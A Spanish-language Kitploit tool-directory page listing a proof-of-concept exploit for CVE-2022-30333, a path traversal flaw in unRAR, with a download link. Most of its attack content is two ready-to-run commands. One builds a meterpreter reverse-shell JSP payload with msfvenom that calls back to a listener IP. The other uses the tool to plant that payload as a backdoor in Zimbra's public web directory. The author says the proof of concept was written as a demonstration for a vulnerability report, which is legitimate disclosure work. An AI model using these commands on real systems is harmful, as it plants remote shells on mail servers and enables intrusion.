Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-30333 — Genera archivos RAR maliciosos que explotan una vulnerabilidad de path traversal en unRAR para colocar archivos en ubicaciones arbitrarias, demostrado con una puerta trasera de Zimbra. | Kitploit
Herramientas/GitHubGitHub/rakhithjk/cve-2022-30333
Frameworks de ExploitsGeneración de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubrakhithjk/cve-2022-30333

CVE-2022-30333

Genera archivos RAR maliciosos que explotan una vulnerabilidad de path traversal en unRAR para colocar archivos en ubicaciones arbitrarias, demostrado con una puerta trasera de Zimbra.

Ver Repositorio
12hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Una prueba de concepto para CVE-2022-30333 - una vulnerabilidad de path traversal en versiones de unRAR anteriores a la 6.11. Creé esto como una demostración del exploit para un informe de AttackerKB, ¡y espero incorporarlo pronto en un Módulo de Metasploit!

Básicamente, proporcionas un objetivo (incluyendo path traversal) y algunos datos de archivo, y esta herramienta generará un .rar que extraerá ese archivo en esa ubicación. La longitud máxima del archivo es de 104 bytes, y la longitud máxima del archivo es de 4096 bytes. (Eso no es intrínseco a la vulnerabilidad, es solo lo que elegí cuando generé el archivo).

Por ejemplo, genera un backdoor con msfvenom:

root@kitploit:~
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp

Luego crea un archivo .rar, plantando el .jsp en algún lugar divertido:

root@kitploit:~
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar
Descargar herramienta